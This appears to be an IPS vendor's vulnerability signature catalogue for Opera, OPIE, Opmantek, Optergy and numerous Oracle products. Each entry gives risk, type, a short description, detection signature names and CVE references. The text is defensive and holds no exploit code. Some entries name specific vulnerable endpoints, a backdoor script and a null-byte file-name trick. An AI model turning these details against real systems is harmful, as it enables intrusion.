Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Opera
Type:	Malfunction
Description:	There is a vulnerability in Opera browser that allows modification of the user preferences from an untrusted script. The preferences modification may be used to execute arbitary code in the context of the current user.
Situation:	HTTP_SS-Opera-Suspicious-Preference-Modification File-Text_Opera-Suspicious-Preference-Modification

Opera-Software-Opera-GIF-Processing-Memory-Corruption

About this vulnerability:

An Opera Software Opera GIF Processing Memory Corruption vulnerability

Risk:

High

First detected in:

sgpkg-ips-1008-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Opera

Type:

Malfunction

Description:

A vulnerability in Opera which allows remote attackers to execute arbitrary code by enticing a target user to open a crafted GIF file, due to an unspecified error in Opera while processing GIF files.

Situation:

File-GIF_Opera-Software-Opera-GIF-Processing-Memory-Corruption

References:

CVE-2012-6470
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6470

Opera-SVG-Animation-Element-DoS

About this vulnerability:	Opera SVG Animation Element DoS Vulnerability.
Risk:	High
First detected in:	sgpkg-ips-676-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Opera
Type:	Browser
Description:	A vulnerability exists in Opera 10.63 which allows remote attackers to cause a denial of service condition by using a malformed SVG animation element.
Situation:	File-TextId_Opera-SVG-Animation-Element-DoS

Opera-SVG-clipPath-After-Memory-Corruption

About this vulnerability:

Opera SVG clipPath use-after-free exploit

Risk:

Moderate

First detected in:

sgpkg-ips-522-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Opera

Type:

Input Validation

Description:

A vulnerability for parsing SVG vector image content exists in Opera Web Browsers prior version 12.13.

Situation:

File-TextId_Opera-SVG-clipPath-After-Memory-Corruption

References:

CVE-2013-1638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1638

OSVDB-89614
http://www.osvdb.org/89614

OPIE-FTP-Username-Off-By-One-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in OPIE

Risk:

High

First detected in:

sgpkg-ips-315-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OPIE

Type:

Buffer Overflow

Description:

There is a vulnerability in OPIE authentication package, included in various Unix distributions. The vulnerability could be exploited by local and remote users to execute arbitrary code on the vulnerable system. The vulnerability is due to a off-by-one vulnerability while processing attacker controlled username. The vulnerable code bounds-check the input string but incorrectly limits it to (buffersize+1). Remote attackers could exploit this vulnerability by sending a longer username to a vulnerable service that uses OPIE. Successful exploitation could result in execution of arbitrary code with root privileges.

Situation:

FTP_Oversized-Username

References:

CVE-2010-1938
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1938

BID-40403
http://www.securityfocus.com/bid/40403

Opmantek-NMIS-SNMP-Trap-Cross-Site-Scripting-CVE-2016-5642

About this vulnerability:

An attempt to exploit a vulnerability in Opmantek NMIS detected

Risk:

High

First detected in:

sgpkg-ips-1867-5242

Last changed:

sgpkg-ips-1867-5242

Platform:

Generic

Software:

Opmantek NMIS

Type:

Input Validation

Description:

Opmantek NMIS before 8.5.12G has a cross-site scripting (XSS) vulnerability via SNMP Trap messages.

Situation:

HTTP_CS-Opmantek-Open-Audit-Discoveries_Helper-Command-Injection

References:

CVE-2016-5642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5642

Opmantek-Open-Audit-Discoveries_Helper-Command-Injection

About this vulnerability:

A vulnerability in Opmantek Open-AudIT

Risk:

Moderate

First detected in:

sgpkg-ips-1267-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Opmantek Open-AudIT

Type:

Input Validation

Description:

Insufficient validation validation of request parameters in discoveries_helper.php causes a command injection vulnerability in Opmante Open-AudIT. A succesful exploit allows an attacker to execute arbitrary commands on the target system with the privileges of the target process.

Situation:

References:

CVE-2020-12078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12078

Opmantek-Open-Audit-M_discoveries.php-Command-Injection

About this vulnerability:

A vulnerability in Opmantek Open-AudIT

Risk:

Moderate

First detected in:

sgpkg-ips-1252-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Opmantek Open-AudIT

Type:

Input Validation

Description:

Insufficient validation of requests to m_discoveries.php causes a command injection vulnerability in Opmantek Open-AudIT. A successful exploit may allow an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CRL-Opmantek-Open-Audit-M_discoveries.php-Command-Injection

References:

CVE-2020-11941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11941

Optergy-Proton-And-Enterprise-BMS-Command-Injection-Using-A-Backdoor

About this vulnerability:

An attempt to exploit a vulnerability in Optergy Proton and Enterprise BMS applications detected

Risk:

High

First detected in:

sgpkg-ips-1657-5242

Last changed:

sgpkg-ips-1657-5242

Platform:

Linux;Unix

Software:

Optergy Proton and Enterprise BMS

Type:

Insecure Configuration

Description:

A vulnerability in Optergy Proton and Enterprise BMS applications, versions 2.0.3a and below, which allows remote attackers to execute arbitrary code through an undocumented backdoor script Console.jsp.

Situation:

HTTP_CSU-Optergy-Proton-And-Enterprise-BMS-Command-Injection-Using-A-Backdoor

References:

CVE-2019-7276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7276

Optima-Apiftp-Server-Exe-Denial-of-Service

About this vulnerability:	A vulnerability in Optima
Risk:	High
First detected in:	sgpkg-ips-609-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Optima
Type:	Misconfiguration
Description:	There is a vulnerability in in Optima PLC control software which allows remote attacker to perform denial of service.
Situation:	Generic_CS-Optima-Apiftp-Server-Exe-Denial-of-Service

Oracle-10g-Isqlplus-Service-Heap-Overflow

About this vulnerability:

A vulnerability in Oracle 10g

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Oracle Application Server 10g

Type:

Buffer Overflow

Description:

The Oracle 10g database software suite provides a web-based interface to allow for remote access and querying of the database. A vulnerability exists in the utility's method of user input parsing. An unauthenticated attacker may exploit this issue to create a denial of service condition or execute arbitrary code on a vulnerable system.

Situation:

HTTP_CRL-Oracle-10g-Isqlplus-Service-Heap-Overflow

References:

BID-10871
http://www.securityfocus.com/bid/10871

Oracle-9i-Xml-Database-BOF

About this vulnerability:

Buffer overflow in Oracle9i XML Database (XDB)

Risk:

High

First detected in:

sgpkg-ips-32-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 9i

Type:

Buffer Overflow

Description:

Oracle9i database server contains multiple buffer overflow vulnerabilities in the XML database (XDB) component. A remote attacker could exploit these to cause a denial of service and to execute arbitrary code on the server.

Situation:

Shared_CS-HTTP-Basic-Authorization-With-Long-Username-Or-Password
Shared_Oracle-9i-XDB-FTP-Server-Unlock-BOF
Shared_FTP-Long-Password
Shared_FTP-Long-TEST

References:

CVE-2003-0727
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727

BID-8375
http://www.securityfocus.com/bid/8375

OSVDB-2449
http://www.osvdb.org/2449

Oracle-Access-Manager-Opensso-Agent-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle Access Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1446-5242

Last changed:

sgpkg-ips-1446-5242

Platform:

Generic

Software:

Oracle Access Manager

Type:

Input Validation

Description:

Insufficient validation of requests sent to the OpenSSO Agent endpoint causes an insecure deserialization vulnerability in Oracle Access Manager. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CS-Oracle-Access-Manager-Opensso-Agent-Insecure-Deserialization

References:

CVE-2021-35587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35587

Oracle-Application-Server-10g-Emagent.exe-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Enterprise Manager Application Server Control

Risk:

High

First detected in:

sgpkg-ips-355-4219

Last changed:

sgpkg-ips-1602-5242

Platform:

Generic

Software:

Oracle Application Server 10g

Type:

Buffer Overflow

Description:

A vulnerability has been reported in Oracle Application Server 10g and numerous other Oracle products. The vulnerability may be exploited remotely to cause a stack based buffer overflow in the affected process. This may allow malicious users to exploit this flaw in order to inject and execute arbitrary code on the target host. In a simple attack case aimed at creating a denial of service condition, Oracle Enterprise Management Agent will terminate. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component will execute in the security context of the Oracleoracleas1ASControl service. This service runs as System by default installation on Windows platforms.

References:

BID-15146
http://www.securityfocus.com/bid/15146

Oracle-Application-Server-10g-OPMN-Service-Format-String-Vulnerability

About this vulnerability:

A vulnerability in Oracle Application Server

Risk:

High

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Application Server

Type:

Format String

Description:

There is a format string vulnerability in Oracle Application Server. The flaw is due to improper handling of user provided data when logging the events. A remote attacker could exploit this vulnerability by sending specially crafted requests to the target system.

Situation:

X11_CS-Oracle-Application-Server-10g-OPMN-Service-Format-String

References:

CVE-2009-0993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0993

BID-34461
http://www.securityfocus.com/bid/34461

Oracle-Application-Server-9i-WebCache-File-Corruption

About this vulnerability:

A vulnerability in Oracle Application Server 9i Web Cache

Risk:

High

First detected in:

sgpkg-ips-356-4219

Last changed:

sgpkg-ips-1589-5242

Platform:

Generic

Software:

Oracle Application Server 9i

Type:

Malfunction

Description:

There exists a vulnerability in the way the Oracle Application Server validates the destination location of Web Cache dump files. The vulnerability is created as a result of insufficient restrictions placed on access rights to the file system. A user with administrative privileges may exploit this vulnerability to place Web Cache dump files into arbitrary locations on the file system.

Situation:

HTTP_CSU-Oracle-Application-Server-9i-WebCache-File-Corruption

References:

CVE-2005-1382
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1382

BID-13420
http://www.securityfocus.com/bid/13420

OSVDB-15909
http://www.osvdb.org/15909

Oracle-Application-Server-Forms-Arbitrary-System-Command-Execution

About this vulnerability:

A vulnerability in Oracle Application Server

Risk:

High

First detected in:

sgpkg-ips-356-4219

Last changed:

sgpkg-ips-1589-5242

Platform:

Generic

Software:

Oracle Application Server

Type:

Code Injection

Description:

There exists a command execution vulnerability in Oracle Forms Services, a component of Oracle Application Server. The vulnerability is caused due to a flaw that allows for the unrestricted execution of forms from an absolute path. An attacker that is able to upload a Forms executable to the application server is able to run any OS command on the application server. The OS commands will be executed with the privileges of the running application server.

Situation:

HTTP_CSU-Oracle-Application-Server-Forms-Arbitrary-System-Command-Execution

References:

CVE-2005-2372
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2372

Oracle-Application-Server-Portal-Cross-Site-Scripting

About this vulnerability:	A vulnerability in Oracle Application Server Portal
Risk:	High
First detected in:	sgpkg-ips-378-4219
Last changed:	sgpkg-ips-1588-5242
Platform:	Generic
Software:	Oracle Application Server Portal
Type:	Malfunction
Description:	A cross-site scripting vulnerability exists in Oracle Application Server Portal.
Situation:	HTTP_CSU-Oracle-Application-Server-Portal-Cross-Site-Scripting

Oracle-Application-Server-Reports-Arbitrary-System-Command-Execution

About this vulnerability:

A vulnerability in Oracle Application Server

Risk:

Moderate

First detected in:

sgpkg-ips-356-4219

Last changed:

sgpkg-ips-1589-5242

Platform:

Generic

Software:

Oracle Application Server; Oracle Developer Suite

Type:

Code Injection

Description:

There exists a command execution vulnerability in Oracle Reports Services, a component of Oracle Application Server. The vulnerability is caused due to a flaw that allows for the unrestricted execution of Reports executables using an absolute path. An attacker that is able to upload a Reports executable to the application server is able to run any OS command or read/write arbitrary text files on the application server. The target system will not show any abnormal behaviour after the malicious Report executable file is uploaded to the target host. After the malicious Report executable is executed, the behaviour of the target is dependent on the nature of the embedded system commands. The malicious system commands execute in the security context of the application server process, which is the user "SYSTEM" on Windows systems and the user "Oracle" on Unix-like systems.

Situation:

HTTP_CSU-Oracle-Application-Server-Reports-Arbitrary-System-Command-Execution

References:

CVE-2005-2371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2371

BID-14316
http://www.securityfocus.com/bid/14316

Oracle-Application-Server-XSS

About this vulnerability:

Oracle Application Server Cross-Site Scripting vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-200-2032

Last changed:

sgpkg-ips-1396-5242

Platform:

Generic

Software:

Oracle Application Server

Type:

Cross-site Scripting

Description:

There is a cross-site scripting vulnerability in Oracle Application Server. This allows a remote user to inject malicious scripts into the the server.

Situation:

HTTP_CSU-Oracle-Application-Server-XSS

References:

CVE-2008-4014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4014

BID-33177
http://www.securityfocus.com/bid/33177

Oracle-Application-Testing-Suite-Actionservlet-Authentication-Bypass

About this vulnerability:

A vulnerability in Oracle Application Testing Suite

Risk:

Moderate

First detected in:

sgpkg-ips-735-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Application Testing Suite

Type:

Malfunction

Description:

Authentication in the Oracle Application Testing Suite can be bypassed by exploiting an input validation vulnerability in the product with a crafted HTTP request.

Situation:

HTTP_CRL-Oracle-Application-Testing-Suite-Actionservlet-Authentication-Bypass

References:

CVE-2016-0487
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0487

Oracle-Application-Testing-Suite-Authentication-Bypass

About this vulnerability:

A vulnerability in Oracle Application Testing Suite

Risk:

Moderate

First detected in:

sgpkg-ips-731-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Application Testing Suite

Type:

Malfunction

Description:

The Oracle Application Testing Suite does not correctly validate parameters passed to it in a URL. This allows an attacker to bypass authentication by means of a a directory traversal.

Situation:

HTTP_CRL-Oracle-Application-Testing-Suite-Authentication-Bypass

References:

CVE-2016-0492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0492

Oracle-Application-Testing-Suite-Download-Schedulereportname-Directory-Traversal

About this vulnerability:

A vulnerability in Oracle Application Testing Suite

Risk:

Moderate

First detected in:

sgpkg-ips-735-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Application Testing Suite

Type:

Directory Traversal

Description:

A directory traversal vulnerability in Oracle's Application Testing Suite can be leveraged to download arbitrary files on the server. The vulnerability is due to improper validation of parameters passed to the /otp/download handler.

Situation:

HTTP_CRL-Oracle-Application-Testing-Suite-Downloadservlet-Schedulereportname-Directory-Traversal

References:

CVE-2016-0481
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0481

Oracle-Application-Testing-Suite-Downloadservlet-File-Directory-Traversal

About this vulnerability:

A vulnerability in Oracle Application Testing Suite

Risk:

Moderate

First detected in:

sgpkg-ips-737-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Application Testing Suite

Type:

Directory Traversal

Description:

Arbitrary files can be downloaded from a server running the Oracle Application Testing Suite by exploiting a directory traversal vulnerability with a crafted request.

Situation:

HTTP_CRL-Oracle-Application-Testing-Suite-Downloadservlet-File-Directory-Traversal

References:

CVE-2016-0482
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0482

Oracle-Application-Testing-Suite-Downloadservlet-Scenario-Directory-Traversal

About this vulnerability:

A vulnerability in Oracle Application Testing Suite

Risk:

Moderate

First detected in:

sgpkg-ips-729-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Application Testing Suite

Type:

Directory Traversal

Description:

The Oracle Application Testing Suite has a directory traversal vulnerability, which can be explited by sending a cradted request to the server. A successful exploitation allows aribtrary files to be downloaded from the server.

Situation:

HTTP_CRL-Oracle-Application-Testing-Suite-Downloadservlet-Scenario-Directory-Traversal

References:

CVE-2016-0477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0477

Oracle-Application-Testing-Suite-Downloadservlet-Scriptpath-Directory-Traversal

About this vulnerability:

A vulnerability in Oracle Application Testing Suite

Risk:

Moderate

First detected in:

sgpkg-ips-731-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Application Testing Suite

Type:

Directory Traversal

Description:

Arbitrary files can be downloaded from a server running the Oracle Application Testing Suite by exploiting a directory traversal vulnerability with a crafted request.

Situation:

HTTP_CRL-Oracle-Application-Testing-Suite-Downloadservlet-Scriptpath-Directory-Traversal

References:

CVE-2016-0484
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0484

Oracle-Application-Testing-Suite-ReportImage-Tempfilename-Directory-Traversal

About this vulnerability:

A vulnerability in Oracle Application Testing Suite

Risk:

High

First detected in:

sgpkg-ips-731-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Application Testing Suite

Type:

Directory Traversal

Description:

There exists a directory path traversal vulnerability in the Oracle Application Testing Suite. A remote attacker can use this to acchieve code execution on the affected system.

Situation:

HTTP_CRL-Oracle-Application-Testing-Suite-ReportImage-Tempfilename-Directory-Traversal

References:

CVE-2016-0489
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0489

Oracle-Application-Testing-Suite-Reportname-Directory-Traversal

About this vulnerability:

A vulnerability in Oracle Application Testing Suite

Risk:

Moderate

First detected in:

sgpkg-ips-726-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Application Testing Suite

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in the in Oracle's Application Testing Suite. Exploiting this vulnerability may lead to arbitrary file download.

Situation:

HTTP_CSU-Oracle-Application-Testing-Suite-Reportname-Directory-Traversal

References:

CVE-2016-0476
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0476

Oracle-Application-Testing-Suite-Uploadfileaction-Filetype-Directory-Traversal

About this vulnerability:

A vulnerability in Oracle Application Testing Suite

Risk:

Moderate

First detected in:

sgpkg-ips-734-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Application Testing Suite

Type:

Directory Traversal

Description:

The Oracle Application Testing Suite insufficiently validates the data sent to URI "/olt/UploadFileUpload.do". A crafted request sent to the server can be used to gain remote code execution on the server. This vulnerability requires prior authentication, which can be bypassed with other attacks.

Situation:

HTTP_CRL-Oracle-Application-Testing-Suite-Uploadfileaction-Filetype-Directory-Traversal

References:

CVE-2016-0491
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0491

Oracle-Application-Testing-Suite-Uploadservlet-Filename-Directory-Traversal

About this vulnerability:

A vulnerability in Oracle Application Testing Suite

Risk:

High

First detected in:

sgpkg-ips-727-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Application Testing Suite

Type:

Directory Traversal

Description:

There exists a directory path traversal vulnerability in the Oracle Application Testing Suite. A remote attacker can use this to acchieve code execution on the affected system.

Situation:

HTTP_CSH-Oracle-Application-Testing-Suite-Uploadservlet-Filename-Directory-Traversal

References:

CVE-2016-0490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0490

Oracle-ATS-Downloadservlet-Exportfilename-Directory-Traversal

About this vulnerability:

A vulnerability in Oracle Application Testing Suite

Risk:

High

First detected in:

sgpkg-ips-742-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Application Testing Suite

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in Oracle's Application Testing Suite. A remote attacker can use this to download arbitrary files from the target server.

Situation:

HTTP_CRL-Oracle-ATS-Downloadservlet-Exportfilename-Directory-Traversal

References:

CVE-2016-0486
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0486

Oracle-ATS-Downloadservlet-Tmapreportimage-Directory-Traversal

About this vulnerability:

A vulnerability in Oracle Application Testing Suite

Risk:

Moderate

First detected in:

sgpkg-ips-744-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Application Testing Suite

Type:

Directory Traversal

Description:

A directory traversal vulnerability resulting from improper input validation in the HTTP request parser of the Oracle ATS may allow an unauthenticated attacker to download arbitrary files.

Situation:

HTTP_CRL-Oracle-ATS-Downloadservlet-Tmapreportimage-Directory-Traversal

References:

CVE-2016-0480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0480

Oracle-AutoVue-ActiveX-Control-SetMarkupMode-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle AutoVue

Risk:

High

First detected in:

sgpkg-ips-461-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle AutoVue

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Oracle AutoVue. The vulnerability is due to an unbounded copy from a heap buffer to a stack buffer when processing SetMarkupMode function. A remote attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user's browser.

Situation:

File-Text_Oracle-AutoVue-ActiveX-Control-SetMarkupMode-Stack-Buffer-Overflow

References:

CVE-2012-0549
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0549

BID-53077
http://www.securityfocus.com/bid/53077

OSVDB-81439
http://www.osvdb.org/81439

Oracle-AutoVue-ActiveX-Export3DBom-Remote-File-Creation

About this vulnerability:

A vulnerability in Oracle AutoVue

Risk:

Moderate

First detected in:

sgpkg-ips-421-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle AutoVue

Type:

Input Validation

Description:

An insecure method is exposed by Oracle AutoVue. The vulnerability is due to the AUTOVUEX.AutoVueXCtrl (AutoVueX.ocx) ActiveX control including the insecure "Export3DBom()" method. This can be exploited to write arbitrary files in the context of the currently logged-on user. A remote attacker could possibly exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.

Situation:

File-Text_Oracle-AutoVue-ActiveX-Export3DBom-Remote-File-Creation

References:

BID-50333
http://www.securityfocus.com/bid/50333

Oracle-AutoVue-ActiveX-ExportEdaBom-Remote-File-Creation

About this vulnerability:	A vulnerability in Oracle AutoVue
Risk:	Moderate
First detected in:	sgpkg-ips-420-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle AutoVue
Type:	Input Validation
Description:	An insecure method is exposed by Oracle AutoVue. The vulnerability is due to the AUTOVUEX.AutoVueXCtrl (AutoVueX.ocx) ActiveX control including the insecure "ExportEdaBom()" method. This can be exploited to write arbitrary files in the context of the currently logged-on user. A remote attacker could possibly exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.
Situation:	File-Text_Oracle-AutoVue-ActiveX-ExportEdaBom-Remote-File-Creation

Oracle-AutoVue-ActiveX-SaveViewStateToFile-Remote-File-Creation

About this vulnerability:

A vulnerability in Oracle AutoVue

Risk:

Moderate

First detected in:

sgpkg-ips-421-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle AutoVue

Type:

Malfunction

Description:

An insecure method is exposed by Oracle AutoVue. The vulnerability exists in Oracle's AutoVue ActiveX control and is due to insufficient input validation of the parameter of "SaveViewStateToFile()" method. This can be exploited to rewrite arbitrary files in the context of the currently logged-on user. A remote attacker could possibly exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.

Situation:

File-Text_Oracle-AutoVue-ActiveX-SaveViewStateToFile-Remote-File-Creation

References:

BID-50321
http://www.securityfocus.com/bid/50321

Oracle-Bea-WebLogic-10-XSS

About this vulnerability:

Oracle Bea WebLgic Server Cross-Site Scripting vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-200-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle BEA WebLogic

Type:

Cross-site Scripting

Description:

There is a cross-site scripting vulnerability in Oracle Bea Weblogic Server. This allows a remote user to inject malicious scripts into the the server.

Situation:

HTTP_CSU-Bea-WebLogic-XSS
Generic_Oracle-Bea-WebLogic-XSS

References:

BID-33177
http://www.securityfocus.com/bid/33177

Oracle-Bea-WebLogic-DOS

About this vulnerability:

Buffer overflow in Oracle BEA Weblogic leads to Denial of Service

Risk:

Moderate

First detected in:

sgpkg-ips-199-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle BEA WebLogic

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in BEA WebLogic Server Apache Connector. The vulnerability is due to a boundary error in the Apache connector. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the target host. Successful exploitation would be a denial of service condition of Apache HTTP services on the target host. In an attack case, the affected server will terminate and all established connections will also be terminated.

Situation:

HTTP_CRL-Oracle-Bea-WebLogic-Server-Apache-Connector-DoS

References:

CVE-2008-5457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5457

BID-33177
http://www.securityfocus.com/bid/33177

Oracle-Bea-WebLogic-Server-Apache-Connector-HTTP-Version-String-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in BEA WebLogic Server

Risk:

High

First detected in:

sgpkg-ips-191-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle BEA WebLogic

Type:

Buffer Overflow

Description:

There is a string buffer overflow vulnerability in Oracle BEA WebLogic Server. There is a boundary checking error in the Apache Connector component that can be exploited by a remote unauthenticated attacker by sending crafted requests to the target host. Successful exploitation allows the attacker to execute arbitrary code on the vulnerable system with the privileges of the running process, typically System.

Situation:

HTTP_CSU-Oracle-Bea-WebLogic-URL-String-BOF
HTTP_CS-Excessively-Long-Request-Version-Field

References:

CVE-2008-3257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3257

BID-30273
http://www.securityfocus.com/bid/30273

Oracle-Bea-WebLogic-Server-Console-help.portal-XSS

About this vulnerability:

A vulnerability in BEA Systems WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-247-3038

Last changed:

sgpkg-ips-1396-5242

Platform:

Generic

Software:

Oracle BEA WebLogic

Type:

Cross-site Scripting

Description:

There is a cross-site scripting vulnerability in BEA Weblogic Server. The vulnerability is due to an input validation error in certain pages that allows attackers to inject arbitrary HTML and JavaScript code that is executed in a user's web browser. A remote unauthenticated attacker can exploit this vulnerability to execute arbitrary HTML or script code on the client system. Successful exploitation results in the compromise of the target user's cookies (including authentication cookies) associated with the site, and modification of user information.

Situation:

HTTP_CSU-Oracle-Bea-WebLogic-Server-Console-help.portal-XSS

References:

CVE-2009-1975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1975

BID-35673
http://www.securityfocus.com/bid/35673

Oracle-Bea-WebLogic-Server-Plug-ins-Certificate-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle BEA WebLogic Server

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle BEA WebLogic Server

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in BEA WebLogic Server Plugins.

Situation:

HTTPS_CS-Oracle-Bea-WebLogic-Server-Plug-ins-Certificate-Buffer-Overflow

References:

CVE-2009-1016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1016

BID-34461
http://www.securityfocus.com/bid/34461

Oracle-BeeHive-Voice-Servlet

About this vulnerability:

An Oracle BeeHive Voice-Servlet vulnerability

Risk:

High

First detected in:

sgpkg-ips-785-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle BeeHive

Type:

Code Injection

Description:

A vulnerability in the voice-servlet component of Oracle BeeHive, versions 2.0.1.0, 2.0.1.1, 2.0.1.2, 2.0.1.2.1, and 2.0.1.3, which allows remote attackers to create a file with an executable extension and execute arbitrary code by includeing a %00 null byte in the file name parameter.

Situation:

HTTP_CSU-Oracle-BeeHive-Voice-Servlet

References:

CVE-2010-4417
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4417

Oracle-BPEL-Process-Manager-Scriptservlet-Information-Disclosure

About this vulnerability:

A vulnerability in Oracle BPEL Process Manager

Risk:

Moderate

First detected in:

sgpkg-ips-554-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Oracle BPEL Process Manager

Type:

Directory Traversal

Description:

There is an information disclosure vulnerability in Oracle BPEL Process Manager. The vulnerability is due to insufficient input validation in ScriptServlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to obtain sensitive information of a target system.

Situation:

HTTP_CSU-Oracle-BPEL-Process-Manager-Scriptservlet-Information-Disclosure

References:

CVE-2013-3828
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3828

OSVDB-98462
http://www.osvdb.org/98462

Oracle-Business-Intelligence-Biremotingservlet-Amf-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle Business Intelligence Enterprise Edition

Risk:

Moderate

First detected in:

sgpkg-ips-1248-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Business Intelligence Enterprise Edition

Type:

Input Validation

Description:

Insufficient validation of data received from the network causes an insecure deserialization vulnerability in Oracle Business Intelligence. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the target process.

Situation:

File-Binary_Oracle-BI-Biremotingservlet-Amf-Insecure-Deserialization

References:

CVE-2020-2950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2950

Oracle-Business-Intelligence-CVE-2021-2401-Xdo-Xml-External-Entity-Injection

About this vulnerability:

A vulnerability in Oracle Business Intelligence Enterprise Edition

Risk:

High

First detected in:

sgpkg-ips-1382-5242

Last changed:

sgpkg-ips-1382-5242

Platform:

Generic

Software:

Oracle Business Intelligence Enterprise Edition

Type:

Input Validation

Description:

